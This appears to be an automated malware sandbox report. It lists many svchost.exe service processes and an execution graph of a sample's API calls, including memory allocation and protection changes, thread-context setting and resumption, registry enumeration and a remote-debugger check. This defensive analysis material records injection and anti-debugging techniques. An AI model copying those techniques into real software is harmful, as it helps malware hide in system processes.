                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:16
                                                                                                                                                                                                                                              Start time:05:20:26
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                                                                                                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:17
                                                                                                                                                                                                                                              Start time:05:20:27
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                                                                                                                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:18
                                                                                                                                                                                                                                              Start time:05:20:27
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                                                                                                                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                                                                              Start time:05:20:28
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                                                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:20
                                                                                                                                                                                                                                              Start time:05:20:28
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                                                                                                                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:21
                                                                                                                                                                                                                                              Start time:05:20:28
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                                                                                                                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:22
                                                                                                                                                                                                                                              Start time:05:20:29
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                                                                                                                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:23
                                                                                                                                                                                                                                              Start time:05:20:29
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                                                                                                                                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:24
                                                                                                                                                                                                                                              Start time:05:20:30
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                                                                                                                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:25
                                                                                                                                                                                                                                              Start time:05:20:31
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                                                                                                                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:26
                                                                                                                                                                                                                                              Start time:05:20:31
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                                                                                                                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:27
                                                                                                                                                                                                                                              Start time:05:20:32
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:28
                                                                                                                                                                                                                                              Start time:05:20:32
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                                                                                                                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:29
                                                                                                                                                                                                                                              Start time:07:03:01
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                                                                                                                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:30
                                                                                                                                                                                                                                              Start time:07:03:02
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k LocalService -p
                                                                                                                                                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:32
                                                                                                                                                                                                                                              Start time:07:03:02
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                                                                                                                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:33
                                                                                                                                                                                                                                              Start time:07:03:04
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                                                                                                                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:34
                                                                                                                                                                                                                                              Start time:07:03:04
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                                                                                                                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:35
                                                                                                                                                                                                                                              Start time:07:03:04
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
                                                                                                                                                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:36
                                                                                                                                                                                                                                              Start time:07:03:05
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                                                                                                                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:37
                                                                                                                                                                                                                                              Start time:07:03:05
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                                                                                                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:38
                                                                                                                                                                                                                                              Start time:07:03:06
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                                                                                                                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:39
                                                                                                                                                                                                                                              Start time:07:03:07
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                                                                                                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:40
                                                                                                                                                                                                                                              Start time:07:03:07
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                                                                                                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Disassembly

                                                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:5.8%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                Signature Coverage:4.6%
                                                                                                                                                                                                                                                Total number of Nodes:131
                                                                                                                                                                                                                                                Total number of Limit Nodes:10
                                                                                                                                                                                                                                                execution_graph 18637 2616f593ac9 18638 2616f593a16 18637->18638 18639 2616f593a66 VirtualQuery 18638->18639 18640 2616f593a80 18638->18640 18641 2616f593a9a VirtualAlloc 18638->18641 18639->18638 18639->18640 18641->18640 18642 2616f593acb GetLastError 18641->18642 18642->18638 18620 2616f5928dc 18622 2616f592922 18620->18622 18621 2616f592984 18622->18621 18624 2616f593858 18622->18624 18625 2616f59387a 18624->18625 18626 2616f593865 StrCmpNIW 18624->18626 18625->18622 18626->18625 18627 2616f59555d 18629 2616f595564 18627->18629 18628 2616f5955cb 18629->18628 18630 2616f595647 VirtualProtect 18629->18630 18631 2616f595681 18630->18631 18632 2616f595673 GetLastError 18630->18632 18632->18631 18721 2616f595d00 18722 2616f595d0d 18721->18722 18724 2616f595d19 18722->18724 18733 2616f595e2a 18722->18733 18723 2616f595d9d 18724->18723 18725 2616f595d4e 18724->18725 18726 2616f595d76 SetThreadContext 18725->18726 18726->18723 18727 2616f595f0e 18729 2616f595f2e 18727->18729 18743 2616f5943f0 18727->18743 18728 2616f595e51 VirtualProtect FlushInstructionCache 18728->18733 18739 2616f594e00 GetCurrentProcess 18729->18739 18732 2616f595f33 18734 2616f595f87 18732->18734 18735 2616f595f47 ResumeThread 18732->18735 18733->18727 18733->18728 18747 2616f597950 18734->18747 18736 2616f595f7b 18735->18736 18736->18732 18738 2616f595fcf 18740 2616f594e1c 18739->18740 18741 2616f594e32 VirtualProtect FlushInstructionCache 18740->18741 18742 2616f594e63 18740->18742 18741->18740 18742->18732 18746 2616f59440c 18743->18746 18744 2616f59446f 18744->18729 18745 2616f594422 VirtualFree 18745->18746 18746->18744 18746->18745 18748 2616f597959 18747->18748 18749 2616f597964 18748->18749 18750 2616f598128 IsProcessorFeaturePresent 18748->18750 18749->18738 18751 2616f598140 18750->18751 18754 2616f59831c 18751->18754 18753 2616f598153 18753->18738 18756 2616f59832d capture_current_context 18754->18756 18755 2616f598336 RtlLookupFunctionEntry 18755->18756 18757 2616f598385 18755->18757 18756->18755 18756->18757 18757->18753 18633 7ffaac564b1c 18634 7ffaac564b25 CloseHandle 18633->18634 18636 7ffaac564bc4 18634->18636 18643 2616f591ac4 18648 2616f591630 GetProcessHeap 18643->18648 18645 2616f591ada Sleep SleepEx 18646 2616f591ad3 18645->18646 18646->18645 18647 2616f5915a0 StrCmpIW StrCmpW 18646->18647 18647->18646 18649 2616f591650 _invalid_parameter_noinfo 18648->18649 18693 2616f591268 GetProcessHeap 18649->18693 18651 2616f591658 18652 2616f591268 2 API calls 18651->18652 18653 2616f591669 18652->18653 18654 2616f591268 2 API calls 18653->18654 18655 2616f591672 18654->18655 18656 2616f591268 2 API calls 18655->18656 18657 2616f59167b 18656->18657 18658 2616f591696 RegOpenKeyExW 18657->18658 18659 2616f5918ae 18658->18659 18660 2616f5916c8 RegOpenKeyExW 18658->18660 18659->18646 18661 2616f5916f1 18660->18661 18662 2616f591707 RegOpenKeyExW 18660->18662 18697 2616f5912bc RegQueryInfoKeyW 18661->18697 18663 2616f59172b 18662->18663 18664 2616f591742 RegOpenKeyExW 18662->18664 18708 2616f59104c RegQueryInfoKeyW 18663->18708 18667 2616f59177d RegOpenKeyExW 18664->18667 18668 2616f591766 18664->18668 18672 2616f5917a1 18667->18672 18673 2616f5917b8 RegOpenKeyExW 18667->18673 18671 2616f5912bc 13 API calls 18668->18671 18674 2616f591773 RegCloseKey 18671->18674 18675 2616f5912bc 13 API calls 18672->18675 18676 2616f5917dc 18673->18676 18677 2616f5917f3 RegOpenKeyExW 18673->18677 18674->18667 18680 2616f5917ae RegCloseKey 18675->18680 18681 2616f5912bc 13 API calls 18676->18681 18678 2616f59182e RegOpenKeyExW 18677->18678 18679 2616f591817 18677->18679 18683 2616f591869 RegOpenKeyExW 18678->18683 18684 2616f591852 18678->18684 18682 2616f59104c 5 API calls 18679->18682 18680->18673 18685 2616f5917e9 RegCloseKey 18681->18685 18686 2616f591824 RegCloseKey 18682->18686 18688 2616f59188d 18683->18688 18689 2616f5918a4 RegCloseKey 18683->18689 18687 2616f59104c 5 API calls 18684->18687 18685->18677 18686->18678 18690 2616f59185f RegCloseKey 18687->18690 18691 2616f59104c 5 API calls 18688->18691 18689->18659 18690->18683 18692 2616f59189a RegCloseKey 18691->18692 18692->18689 18714 2616f5a6168 18693->18714 18695 2616f591283 GetProcessHeap 18696 2616f5912ae _invalid_parameter_noinfo 18695->18696 18696->18651 18698 2616f59148a RegCloseKey 18697->18698 18699 2616f591327 GetProcessHeap 18697->18699 18698->18662 18705 2616f59133e _invalid_parameter_noinfo 18699->18705 18700 2616f591352 RegEnumValueW 18700->18705 18701 2616f591476 GetProcessHeap HeapFree 18701->18698 18703 2616f59141e lstrlenW GetProcessHeap 18703->18705 18704 2616f5913d3 GetProcessHeap 18704->18705 18705->18700 18705->18701 18705->18703 18705->18704 18706 2616f591443 StrCpyW 18705->18706 18707 2616f5913f3 GetProcessHeap HeapFree 18705->18707 18716 2616f591534 18705->18716 18706->18705 18707->18703 18709 2616f5911b5 RegCloseKey 18708->18709 18712 2616f5910bf _invalid_parameter_noinfo 18708->18712 18709->18664 18710 2616f5910cf RegEnumValueW 18710->18712 18711 2616f59114e GetProcessHeap 18711->18712 18712->18709 18712->18710 18712->18711 18713 2616f59116e GetProcessHeap HeapFree 18712->18713 18713->18712 18715 2616f5a6177 18714->18715 18717 2616f59154e 18716->18717 18720 2616f591584 18716->18720 18718 2616f59156d StrCmpW 18717->18718 18719 2616f591565 StrCmpIW 18717->18719 18717->18720 18718->18717 18719->18717 18720->18705 18758 7ffaac564a02 18759 7ffaac564a11 CheckRemoteDebuggerPresent 18758->18759 18761 7ffaac564ae8 18759->18761 18762 2616f302750 18763 2616f30277e 18762->18763 18764 2616f3027d9 VirtualAlloc 18763->18764 18765 2616f302800 18763->18765 18764->18765

                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                Function 00007FFAAC560C5E Relevance: 8.5, Strings: 6, Instructions: 997COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1600102747.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffaac560000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 0W$b4$r6$r6$r6$r6
                                                                                                                                                                                                                                                • API String ID: 0-2485616068
                                                                                                                                                                                                                                                • Opcode ID: 6fef828fced36ecf08f310f08a1a4bb619caccd4b0719aab082e4cbee0a0039c
                                                                                                                                                                                                                                                • Instruction ID: d02396f08a380a3596a354063c1759dc7da599885189e6e9bedc2eb50ce036b4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6fef828fced36ecf08f310f08a1a4bb619caccd4b0719aab082e4cbee0a0039c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 78828B70D4861A8FEB48EF68C4959FDB7F1FF49300F1485A9E01AE7292DA38E945CB50
                                                                                                                                                                                                                                                Function 00007FFAAC564A02 Relevance: 1.6, APIs: 1, Instructions: 130COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 644 7ffaac564a02-7ffaac564a0f 645 7ffaac564a11-7ffaac564a19 644->645 646 7ffaac564a1a-7ffaac564a2b 644->646 645->646 647 7ffaac564a2d-7ffaac564a35 646->647 648 7ffaac564a36-7ffaac564ae6 CheckRemoteDebuggerPresent 646->648 647->648 653 7ffaac564aee-7ffaac564b14 648->653 654 7ffaac564ae8 648->654 654->653
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1600102747.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffaac560000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CheckDebuggerPresentRemote
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3662101638-0
                                                                                                                                                                                                                                                • Opcode ID: 6a8b4a6511aa9f747acdce01df3f3901a931448b1d47ea36ed90acfcb77bd5c0
                                                                                                                                                                                                                                                • Instruction ID: a3fd3201f30c87a7974bab511727788a91113be0c0c134c799f6400a306f2b8f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a8b4a6511aa9f747acdce01df3f3901a931448b1d47ea36ed90acfcb77bd5c0
